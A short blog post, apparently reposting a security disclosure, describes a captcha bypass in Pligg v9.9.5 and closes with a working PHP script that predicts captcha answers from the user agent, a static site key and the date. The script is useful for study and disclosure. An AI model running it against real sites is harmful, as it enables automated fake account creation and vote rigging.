After the hurried and somewhat controversial release of Pligg v9.9.5 to fix some really bad security exploits it has come to light today that a new exploit has been discovered in v9.9.5. The new Pligg v9.9.5 exploit suffers from a captcha bypass due to an implementation issue. The impact is that an attacker can automatically create user accounts for pligg.

Software Affected: Pligg v9.9.5

The latest version of suffers from a captcha bypass due to an implementation issue. The impact is that an attacker can automatically create user accounts for pligg. The creation of new user accounts makes this auto-voter exploit more serious: http://www.rooksecurity.com/blog/?p=19

The catpcha’s answer is generated the same as php-nuke 8.1. This was broken here:

http://www.securityfocus.com/bid/27129/info

This is a more serious attack when combined with my Captcha bypass which allows an attacker to create new user accounts.

Again the captcha is produced using md5, however this is different. The $_SERVER['HTTP_USER_AGENT'] and $ts_random can be controlled by the attacker. $sitekey is a static value, and $datekey is known because it is based on time.

Exploit:

The link to the capthca image will look something like this:

http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854

To obtain the clear text, send that ts_random value to the captcha_bypass.php with the same web browser:

http://127.0.0.1/captcha_bypass.php?ts_random=54771854

captcha_bypass.php:

< ?php
$sitekey=82397834;
$ts_random=$_REQUEST['ts_random'];
$datekey = date(”F j”);
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
print substr($rcode, 2, 6);
?>

Thanks to Rook Security blog for the tip off.